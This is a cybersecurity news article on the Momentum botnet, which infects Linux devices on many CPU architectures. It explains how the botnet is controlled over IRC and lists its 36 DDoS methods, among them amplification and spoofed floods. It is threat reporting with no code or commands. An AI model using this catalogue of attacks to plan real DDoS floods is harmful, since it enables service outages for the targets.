22 C
Jaipur
Monday, October 26, 2020

Momentum Botnet Attacks Linux Devices and Recruit them as Botnet

Must read

8 Ways to Check CPU Clock Speed on Linux

A CPU clock speed determines how fast your CPU can process instructions every second. It measures the number of cycles your CPU can execute,...

A Brief Process Of Create a Cyber Security Infrastructure

In earlier years, everyone depends on SOC (includes firewalls, WAF, SIEM,etc.) and the prioritize in building the SOC provides security and the CIA was...

Best phone in the US for 2020: the top 15 smartphones we’ve tested

Buying the best phone in 2020 is an expensive investment no matter if it comes from Samsung, Apple, or Google, meaning your decision is...

World Series live stream: how to watch Dodgers vs Rays game 5 from anywhere today

2020's shortened MLB season will come to an end this week and baseball will crown a new champion - but who will it be?...

Security researchers from Trend Micro observed a new malware activity targeting devices running the Linux platform, the malware samples found to be connected with Momentum Botnet.

The malware campaign targets to install a backdoor on the Linux platform that accepts commands from attackers server to conduct various types of DoS attacks against a given target.

Momentum Botnet Attack Campaign

The Momentum botnet targets the Linux platform running on various CPU architectures such as ARM, MIPS, Intel, Motorola 68020, and more. Mirai, Kaiten, and Bashlite are the backdoor variants distributed by the Momentum botnet.

The botnet exploits various vulnerabilities on the targeted router devices and web services to deploy and execute PowerShell scripts.

Momentum Botnet
Botnet servers

Once the botnet infects the device it modified run commands config file “rc” and adds them to command and control (C&C) server through internet relay chat (IRC) channel.

Then the infected device gets connected with the distribution server, it uses various commands to launch 36 different methods using the compromised devices.

Command Description
ACK ACK flooder
ADV-TCP TCP flooding – Improved SSYN Attack
BLACKNURSE An ICMP packet flooder
DNS DNS amplification flooder
ECE attacking (Not in use) Type of SYN flood
ESSYN ExecuteSpoofedSyn Flooder
FIN attacking (Not in use) FIN flood
FRAGACK ACK Fragmentation Flood
FRAG-TCP Spoofed TCP Fragmentation Flooder
GRE GRE flood
HOLD (Not in use) TCP connect flooder(frag)
HTTP HTTP Flooder
HTTPFLOOD HTTP flooding
JUNK TCP flooder (frag)
LDAP LDAP amplification flooder
MEMCACHE MEMCACHE amplification flooder
NSACK Type of ACK flood
NSSYN Type of SYN flooder
OVH Type of UDP flooding (DOMINATE)
PHATWONK Multiple attacks in one e.g. xmas, all flags set at once, usyn (urg syn), and any TCP flag combination.
RTCP A Random TCP Flooder Fragmented packet header
SACK Type of TCP flood
SEW Attack Type of SYN flood
SSYN2 Type of SYN flood
STUDP STD Flooder
STUDP STD Flooder
SYN SYN flooder
SYNACK SYN-ACK flood
TCPNULL TCP-Nulled flooding – Flood with TCP packets with no flag set
UDP UDP flood
UDP-BYPASS A udp flooder (vulnMix)
UNKNOWN UDP Flooder
URG attacking
VOLT-UDP Spoofed UDP Flooder, Can Bypass most firewall
VSE Valve Source Engine Amplification
XMAS TCP Xmas flood

Researchers observed that with MEMCACHE, LDAP, DNS, and Valve Source Engine, the malware attack typically spoofs the source IP address to publicly accessible servers.

The botnet is also capable of “opening a proxy on a port on a specified IP, changing the nick of the client, disabling or enabling packeting from the client, and more.”

With LDAP DDoS reflection, Memcache attack the botnet spoofs the source IP address and with UDP-BYPASS attack targets the host by constructing and unloading a legitimate UDP payload on a specific port.

The Momentum botnet includes other capabilities such as Fast flux, Backdoor and Propagate to spread and compromise devices.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates

Source link

- Advertisement -

More articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest article

8 Ways to Check CPU Clock Speed on Linux

A CPU clock speed determines how fast your CPU can process instructions every second. It measures the number of cycles your CPU can execute,...

A Brief Process Of Create a Cyber Security Infrastructure

In earlier years, everyone depends on SOC (includes firewalls, WAF, SIEM,etc.) and the prioritize in building the SOC provides security and the CIA was...

Best phone in the US for 2020: the top 15 smartphones we’ve tested

Buying the best phone in 2020 is an expensive investment no matter if it comes from Samsung, Apple, or Google, meaning your decision is...

World Series live stream: how to watch Dodgers vs Rays game 5 from anywhere today

2020's shortened MLB season will come to an end this week and baseball will crown a new champion - but who will it be?...

Seahawks vs Cardinals live stream: how to watch NFL Sunday Night Football from anywhere

The 5-0 Seattle Seahawks are heading into Sunday’s game against the Arizona Cardinals with a full week’s rest and one heck of a season...